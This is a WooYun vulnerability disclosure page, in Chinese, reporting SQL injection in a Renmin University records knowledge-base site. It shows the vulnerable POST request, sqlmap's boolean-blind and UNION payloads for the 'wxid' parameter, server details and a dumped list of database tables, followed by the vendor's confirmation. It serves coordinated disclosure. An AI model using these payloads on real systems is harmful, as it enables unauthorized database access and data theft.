当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107614

漏洞标题:中国人民大学某站存在SQL注入漏洞

相关厂商:中国人民大学

漏洞作者: 深度安全实验室

提交时间:2015-04-14 18:46

修复时间:2015-05-30 09:24

公开时间:2015-05-30 09:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-25: 细节向核心白帽子及相关领域专家公开
2015-05-05: 细节向普通白帽子公开
2015-05-15: 细节向实习白帽子公开
2015-05-30: 细节向公众公开

简要描述:

详细说明:

http://erm-kbs.ruc.edu.cn/

电子文件管理知识库,存在SQL注入

POST /ext/getwx.ashx?t=info HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://erm-kbs.ruc.edu.cn:80/Ext/WxDetail.aspx?type=50&id=d9ef9331-1aae-46fd-85f5-956711b5f083
Host: erm-kbs.ruc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
wxid=d9ef9331-1aae-46fd-85f5-956711b5f083&wxtype=50

wxid参数

1.JPG


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: wxid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' AND 4059=4059 AND 'uPCZ'='uPCZ&wxtype=50
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(113)+CHAR(120)+CHAR(102)+CHAR(69)+CHAR(82)+CHAR(81)+CHAR(87)+CHAR(67)+CHAR(66)+CHAR(111)+CHAR(86)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(111)+CHAR(113),NULL-- &wxtype=50
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: renda
[209 tables]
+---------------------------+
| DB_FWQPZ                  |
| DB_SHAITU                 |
| DB_ZDDY                   |
| DB_ZDDYPZ                 |
| D_FGF                     |
| D_FLB                     |
| D_PZK                     |
| Droit_Item                |
| DropMessages              |
| F_TABLE                   |
| FullTextIndexFiles        |
| FullTextIndexFiles_backup |
| GROUPS                    |
| Info2kGetDwg              |
| InfoSysDocument           |
| OA_INFO                   |
| OPERATORS                 |
| RIGHT_LIST                |
| RIGHT_TREE                |
| S_AUTOSET                 |
| S_BORROW_1                |
| S_DALX                    |
| S_GLMS                    |
| S_KUFANG_1                |
| S_LOG                     |
| S_MLINdex                 |
| S_MLS                     |
| S_QZH                     |
| S_REPORT                  |
| S_TJPROJECT               |
| TMP_S_BORROW_1            |
| UserCounter               |
| code01dict                |
| code02dict                |
| code11dict                |
| code12dict                |
| code15dict                |
| code16dict                |
| code17dict                |
| code18dict                |
| code19dict                |
| code20dict                |
| code21dict                |
| code22dict                |
| code23dict                |
| code24dict                |
| code25dict                |
| code26dict                |
| code27dict                |
| code28dict                |
| code29dict                |
| code30dict                |
| code31dict                |
| code32dict                |
| code33dict                |
| code34dict                |
| code35dict                |
| code36dict                |
| code37dict                |
| code38dict                |
| codetypedict              |
| datatable102              |
| datatable103              |
| datatable104              |
| datatable105              |
| datatable106              |
| datatable107              |
| datatable109              |
| datatable111              |
| datatable114              |
| datatable115              |
| datatable116              |
| datatable117              |
| datatable118              |
| datatable119              |
| datatable120              |
| datatable121              |
| datatable85               |
| datatable86               |
| datatable87               |
| datatable88               |
| datatable89               |
| datatable90               |
| destroy_datatable102      |
| destroy_datatable103      |
| destroy_datatable104      |
| destroy_datatable105      |
| destroy_datatable106      |
| destroy_datatable107      |
| destroy_datatable109      |
| destroy_datatable111      |
| destroy_datatable114      |
| destroy_datatable115      |
| destroy_datatable116      |
| destroy_datatable117      |
| destroy_datatable118      |
| destroy_datatable119      |
| destroy_datatable120      |
| destroy_datatable121      |
| destroy_datatable85       |
| destroy_datatable86       |
| destroy_datatable87       |
| destroy_datatable88       |
| destroy_datatable89       |
| destroy_datatable90       |
| destroy_sw                |
| dtproperties              |
| e_datatable102            |
| e_datatable103            |
| e_datatable104            |
| e_datatable105            |
| e_datatable106            |
| e_datatable107            |
| e_datatable109            |
| e_datatable111            |
| e_datatable114            |
| e_datatable115            |
| e_datatable116            |
| e_datatable117            |
| e_datatable118            |
| e_datatable119            |
| e_datatable120            |
| e_datatable121            |
| e_datatable85             |
| e_datatable86             |
| e_datatable87             |
| e_datatable88             |
| e_datatable89             |
| e_datatable90             |
| e_destroy_datatable102    |
| e_destroy_datatable103    |
| e_destroy_datatable104    |
| e_destroy_datatable105    |
| e_destroy_datatable106    |
| e_destroy_datatable107    |
| e_destroy_datatable109    |
| e_destroy_datatable111    |
| e_destroy_datatable114    |
| e_destroy_datatable115    |
| e_destroy_datatable116    |
| e_destroy_datatable117    |
| e_destroy_datatable118    |
| e_destroy_datatable119    |
| e_destroy_datatable120    |
| e_destroy_datatable121    |
| e_destroy_datatable85     |
| e_destroy_datatable86     |
| e_destroy_datatable87     |
| e_destroy_datatable88     |
| e_destroy_datatable89     |
| e_destroy_datatable90     |
| eplotjiekou               |
| fafangcode                |
| jiekou                    |
| plot_info                 |
| right_detail              |
| s_Condition               |
| s_kufanginfo              |
| s_mkset                   |
| s_userset                 |
| s_xtpxzd                  |
| tableform                 |
| tmp_datatable102          |
| tmp_datatable103          |
| tmp_datatable104          |
| tmp_datatable105          |
| tmp_datatable106          |
| tmp_datatable107          |
| tmp_datatable109          |
| tmp_datatable111          |
| tmp_datatable114          |
| tmp_datatable115          |
| tmp_datatable116          |
| tmp_datatable117          |
| tmp_datatable118          |
| tmp_datatable119          |
| tmp_datatable120          |
| tmp_datatable121          |
| tmp_datatable85           |
| tmp_datatable86           |
| tmp_datatable87           |
| tmp_datatable88           |
| tmp_datatable89           |
| tmp_datatable90           |
| tsqx                      |
| usertbl                   |
| userwebqx                 |
| view_datatable102         |
| view_datatable103         |
| view_datatable104         |
| view_datatable105         |
| view_datatable106         |
| view_datatable107         |
| view_datatable109         |
| view_datatable111         |
| view_datatable114         |
| view_datatable115         |
| view_datatable116         |
| view_datatable117         |
| view_datatable118         |
| view_datatable119         |
| view_datatable120         |
| view_datatable121         |
| view_datatable85          |
| view_datatable86          |
| view_datatable87          |
| view_datatable88          |
| view_datatable89          |
| view_datatable90          |
+---------------------------+

2.JPG


漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-15 09:24

厂商回复:

非常感谢!已通知。

最新状态:

暂无

漏洞评价:

评论